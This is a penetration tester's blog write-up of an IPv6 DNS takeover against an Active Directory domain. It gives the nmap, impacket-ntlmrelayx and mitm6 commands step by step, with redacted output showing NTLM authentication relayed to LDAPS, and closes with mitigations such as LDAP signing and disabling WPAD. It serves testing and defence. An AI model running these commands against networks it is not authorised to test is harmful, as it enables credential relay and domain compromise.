Monday, May 08, 2023

IPv6 DNS Takeover via mitm6 (Write Up)

Howdy Readers!


If you're into network pentesting, I'm sure you're familiar with this type of vulnerability. This vulnerability is all about IPv6 and DNS. 


IPv6 is the latest version of the Internet Protocol, which is used to identify and communicate with devices on the internet. DNS or the Domain Name System is a service that translates human-readable domain names (like "google.com") into IP addresses (like "2xx.xx.xxx.xx2") that devices can use to connect to websites and other internet services.


So IPv6 DNS takeover via mitm6 is a technique used to intercept and redirect DNS requests made by IPv6-enabled devices on a network. "mitm6" stands for "man-in-the-middle-6", and refers to the fact that this attack involves intercepting and manipulating network traffic in order to carry out the DNS takeover.


An IPv6 DNS takeover through mitm6 assault begins with an attacker intercepting and manipulating network traffic with the mitm6 tool. Specifically, the attacker broadcasts bogus router advertising to IPv6-enabled devices on the network, tricking them into routing their traffic through the attacker's workstation.


Once the attacker has control of the DNS requests, they can utilize them to carry out a variety of attacks. For instance, they might divert traffic intended for a legitimate website to a phony version of the same site that is intended to steal sensitive data like login credentials. 


So below is the step by step procedure on how to execute the attack. (PS: This guide is from one of my internal network penetration test report so I redacted some sensitive information of the target.)


--Tools--

  • NMAP
  • NTLMRelayx from Impacket
  • mitm6

--Steps to Reproduce--


1. Let's determine the domain name of the target using NMAP (nmap -n -sV --script "ldap* and not brute" 1x.xx.xx.x1).

Sample Request:

Nmap scan report for 1x.xx.xx.x1
Host is up (0.0020s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE  SERVICE           VERSION
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-05-01 10:20:01Z)
113/tcp  closed ident
135/tcp  open   msrpc?
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: test.redacted.site, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=test,DC=redacted,DC=site
|       ldapServiceName: test.redacted.site:[email protected]
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: XXXX
|       supportedSASLMechanisms: XXX-XXXXXX
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedLDAPVersion: 3
|       supportedLDAPVersion: 2
|       supportedLDAPPolicies: MaxPoolThreads
|       supportedLDAPPolicies: MaxPercentDirSyncRequests
|       supportedLDAPPolicies: MaxDatagramRecv
|       supportedLDAPPolicies: MaxReceiveBuffer
|       supportedLDAPPolicies: InitRecvTimeout
|       supportedLDAPPolicies: MaxConnections
|       supportedLDAPPolicies: MaxConnIdleTime
|       supportedLDAPPolicies: MaxPageSize

<--snip-->
So as you can see port 389 (LDAP) is open which means that our target is vulnerable to the attack. IPv6 DNS takeover is not tied to a specific port number.

As a result, even though the attack does not specifically target any one port, it is crucial to understand that it can still be executed on any port that an IPv6-enabled network uses for DNS requests and responses.

2. Run NTLMRelay using the following command (impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.xx -wh fakewpad.test.redacted.site -l lootme)

Sample Request:
impacket-ntlmrelayx -6 -t ldaps://1x.xx.xx.x1 -wh fakewpad.test.redacted.site -l lootme
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.xx.1xx
[*] SMBD-Thread-6 (process_request_thread): Received connection from ::ffff:1xx.xx.xx.xx, attacking target ldaps://1x.xx.xx.x1
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Client requested path: /wpad.dat
[*] HTTPD(80): Serving PAC file to client ::ffff:1xx.xx.x.xx
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff:1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Connection from ::ffff: 1xx.xx.xx.xx controlled, attacking target ldaps://
1x.xx.xx.x1
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Authenticating against ldaps://1x.xx.xx.x1 as TESTCLIENT/TESTUSER1 SUCCEED

<--snip-->
As you can we already received SUCCEED response from the NTLMRelay

3. Open another terminal and run mitm6 using the following command (mitm6 -d test.redacted.site)

Sample Request:
mitm6 -d test.redacted.site
:0: UserWarning: You do not have a working installation of the service_identity module: 'No module named 'service_identity''.  Please install it from <https://pypi.python.org/pypi/service_identity> and make sure all of its dependencies are satisfied.  Without the service_identity module, Twisted can perform only rudimentary TLS client hostname verification.  Many valid certificate/hostname mappings may be rejected.
Starting mitm6 using the following configuration:
Primary adapter: eth0 [00:xx:xx:xx:xx:xx]
IPv4 address: 1xx.xx.xx.xx
IPv6 address: fxxx::2xx:xxxx:xxxx:xxxx
DNS local search domain: test.redacted.site
DNS allowlist: test.redaceted.site
IPv6 address fxxx::2xxx:x is now assigned to mac=xx:xx:xx:xx:xx:xx host=TESTHOST. ipv4=
Sent spoofed reply for mgmt.test.redacted.site. to fxxx::xxx:xx

<--snip-->
4. After the successful attack, Open another terminal and then ls to the lootme folder. 
5. Check the files from the lootme folder.

lootme folder

6. Verify the vulnerability.



--Recommendations--
  • The safest way to prevent man-in-the-middle attacks using mitm6 is to block DHCPv6 traffic and incoming RA (router advertisements) in Windows Firewall Group Policy since disabling IPv6 completely may result in unwanted side effects on the network.
  • If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.
  • LDAP and LDAPS relay mitigation is by enabling both LDAP signing and LDAP channel binding.
  • Consider Administrative Users to the Protected Users group or marking them as Account is sensitive and cannot be delegated will prevent any impersonation of that user via delegation.
--References--
  • https://docs.microsoft.com/en-us/archive/blogs/netro/arguments-against-disabling-ipv6
  • https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course

The vulnerability was rated as Critical in our pentest reports.

I hope you find this article interesting and useful.

"Always remember that you are absolutely unique. Just like everyone else."
–Margaret Mead

No comments:

Post a Comment